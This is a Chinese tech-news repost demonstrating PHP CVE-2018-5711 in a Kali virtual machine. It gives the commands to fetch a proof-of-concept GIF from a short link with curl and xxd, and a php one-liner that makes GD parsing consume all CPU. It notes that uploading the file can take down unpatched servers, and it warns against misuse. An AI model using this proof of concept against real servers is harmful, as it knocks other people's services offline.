一张动图宕掉一台服务器!运维这个腊月又要忙了

本文来源:海阳顶端(今日头条作者)

台湾的黑客orange发现了一个漏洞,编号为PHP CVE-2018-5711,这个漏洞能瞬间让支持php的服务器宕机,我用KALI 2017.3的虚拟机来演示一下。

一、检测我的虚拟机是否装有php-gd库

1、运行命令:php -m | grep -i gd

2、如果上图中没有出现gd,我们就需要装一下了。运行命令apt-get install php-gd

二、生成恶意的gif文件

1、curl -L https://git.io/vN0n4 | xxd -r > poc.gif

2、运行top命令看下我的CPU使用率

3、测试恶意代码:

php -r 'imagecreatefromgif("poc.gif");'

CPU瞬间上升到了百分百,我想再运行一下top命令来个CPU对比图都做不到了,不得不重启我的KALI。

这个漏洞的影响版本范围如下:

PHP 5

PHP 7.0

PHP 7.1

PHP 7.2

如果服务器支持php-gd库的话,上传生成的poc.gif,服务器就宕掉了。最后我要郑重说下,这个漏洞肯定有的服务器还没有补,如果你去搞恶作剧的话,会给对方造成经济损失的,会违反国家安全法律,所以一定要在虚拟机里测试,明白这个漏洞的原理就行。

  • 发表于:
  • 原文链接:http://kuaibao.qq.com/s/20180131A0HIGU00?refer=cp_1026

同媒体快讯

相关快讯

扫码关注云+社区